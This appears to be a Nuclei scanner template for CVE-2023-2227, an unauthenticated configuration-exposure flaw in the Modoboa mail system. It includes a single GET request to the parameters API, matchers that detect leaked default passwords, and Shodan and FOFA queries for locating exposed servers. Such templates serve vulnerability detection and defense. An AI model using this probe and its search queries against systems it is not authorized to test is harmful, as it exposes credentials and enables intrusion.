id: CVE-2023-2227 info: name: Modoboa < 2.1.0 - Improper Authorization author: ritikchaddha,princechaddha severity: critical description: | Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0. impact: | Unauthenticated attackers can access sensitive configuration parameters including default passwords and authentication settings through the API endpoint, potentially compromising the entire email management system. remediation: | Update Modoboa to version 2.1.0 or later that implements proper authorization checks for the parameters API endpoint. reference: - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3 - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97 - https://nvd.nist.gov/vuln/detail/CVE-2023-2227 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2023-2227 cwe-id: CWE-285 epss-score: 0.77817 epss-percentile: 0.99018 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: modoboa product: modoboa shodan-query: - "http.favicon.hash:1949005079" - http.html:"modoboa" fofa-query: - "body=\"Modoboa\"" - body="modoboa" - icon_hash=1949005079 tags: cve,cve2023,modoboa,exposure,disclosure,vuln http: - raw: - | GET /api/v2/parameters/core/ HTTP/1.1 Host: {{Hostname}} User-Agent: 7h3h4ckv157 matchers-condition: and matchers: - type: word part: body words: - 'label":' - 'default_password":' - 'authentication_type":"local' condition: and - type: word part: header words: - 'application/json' - type: status status: - 200 # digest: 490a0046304402202f1cf0cfebba15fe32230197c42abd2e66b5c6fb09f2f752bf22aaced19b7fcf0220135a95561a3a7d4f6e1123a56bffcbe51f3d69d572fb97686703ee30bff4bf39:922c64590222798bb761d5b6d8e72950